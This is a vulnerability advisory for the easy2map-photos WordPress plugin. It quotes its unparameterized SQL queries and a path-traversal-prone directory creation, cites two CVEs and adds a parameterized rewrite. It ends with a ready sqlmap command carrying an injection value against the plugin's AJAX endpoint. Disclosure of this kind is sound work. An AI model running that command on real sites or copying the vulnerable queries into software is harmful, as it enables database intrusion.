Title: SQL Injection in easy2map-photos WordPress plugin v1.09
The following lines in Functions.php are vulnerable to SQL injection because the queries are not parameterized and user input is not sanitized.

Lines 48-50:

    $wpdb->query(sprintf("UPDATE $mapsTable
    SET PolyLines = '%s'
    WHERE ID = '%s';", $PolyLines, $mapID));

Lines 218-235:

    $wpdb->query(sprintf("
        UPDATE $mapsTable
        SET TemplateID = '%s',
            MapName = '%s',
            Settings = '%s',
            CSSValues = '%s',
            CSSValuesPhoto = '%s',
            CSSValuesMap = '%s',
            MapHTML = '%s',
            IsActive = 1
        WHERE ID = %s;",
            $_REQUEST['mapTemplateName'],
            $_REQUEST['mapName'],
            urldecode($_REQUEST['mapSettingsXML']),
            urldecode($_REQUEST["parentCSSXML"]),
            urldecode($_REQUEST["photoCSSXML"]),
            urldecode($_REQUEST["mapCSSXML"]),
            urldecode($_REQUEST["mapHTML"]), $mapID));


Lines 238-254:

    //this is a map insert
    if (!$wpdb->query(sprintf("
    INSERT INTO $mapsTable(
        TemplateID,
        MapName,
        DefaultPinImage,
        Settings,
        LastInvoked,
        PolyLines,
        CSSValues,
        CSSValuesPhoto,
        CSSValuesMap,
        MapHTML,
        IsActive
    ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s'    , 0);",
            $_REQUEST['mapTemplateName'],
            $_REQUEST['mapName']


Lines 331-337:

    $wpdb->query(sprintf("
        UPDATE $mapsTable
        SET MapName = '%s'
        IsActive = 1
        WHERE ID = %s;",
            $_REQUEST['mapName'],
            $mapID));
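
A parameterized rewrite of two of the queries above (Functions.php lines 331-337 and 218-235), added here as an example; it is not code from the plugin or from this advisory's author. The function names, the $request parameter, reading mapID from the request, and treating MapName as plain text are assumptions.

```php
<?php
// Added example, not the plugin's code; function names and parameters are
// hypothetical. $mapsTable is assumed to be built from $wpdb->prefix, never
// from request data, because identifiers cannot be bound as placeholders.

// Read one request field: strip the slashes WordPress adds and optionally
// urldecode it, as the original code does for the XML/HTML fields.
function e2m_example_field( array $request, $key, $urlencoded = false ) {
    if ( ! isset( $request[ $key ] ) || ! is_string( $request[ $key ] ) ) {
        return '';
    }
    $value = wp_unslash( $request[ $key ] );
    return $urlencoded ? urldecode( $value ) : $value;
}

// Functions.php lines 331-337: rename a map.
function e2m_example_save_map_name( $wpdb, $mapsTable, array $request ) {
    $mapID = absint( e2m_example_field( $request, 'mapID' ) );
    if ( 0 === $mapID ) {
        return false; // no usable numeric ID in the request
    }
    // Placeholders are not wrapped in quotes: prepare() quotes and escapes
    // %s itself and casts %d to an integer.
    $sql = $wpdb->prepare(
        "UPDATE `$mapsTable` SET MapName = %s, IsActive = 1 WHERE ID = %d",
        sanitize_text_field( e2m_example_field( $request, 'mapName' ) ), // assumes plain-text names
        $mapID
    );
    return $wpdb->query( $sql );
}

// Functions.php lines 218-235: the full map update via $wpdb->update(),
// which builds a prepared statement from the format arrays.
function e2m_example_update_map( $wpdb, $mapsTable, array $request, $mapID ) {
    $data = array(
        'TemplateID'     => e2m_example_field( $request, 'mapTemplateName' ),
        'MapName'        => sanitize_text_field( e2m_example_field( $request, 'mapName' ) ),
        'Settings'       => e2m_example_field( $request, 'mapSettingsXML', true ),
        'CSSValues'      => e2m_example_field( $request, 'parentCSSXML', true ),
        'CSSValuesPhoto' => e2m_example_field( $request, 'photoCSSXML', true ),
        'CSSValuesMap'   => e2m_example_field( $request, 'mapCSSXML', true ),
        'MapHTML'        => e2m_example_field( $request, 'mapHTML', true ),
        'IsActive'       => 1,
    );
    $formats = array( '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%d' );
    return $wpdb->update( $mapsTable, $data, array( 'ID' => absint( $mapID ) ), $formats, array( '%d' ) );
}
```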

Also

In MapPinImageUpload.php and MapPinIconSave.php, the following code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters:

   if (!file_exists($imagesDirectory)) {
       mkdir($imagesDirectory);
   }

CVE-2015-4615 SQL Injection
CVE-2015-4617 Path traversal

$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie='COOKIE HERE' --level=5 --risk=3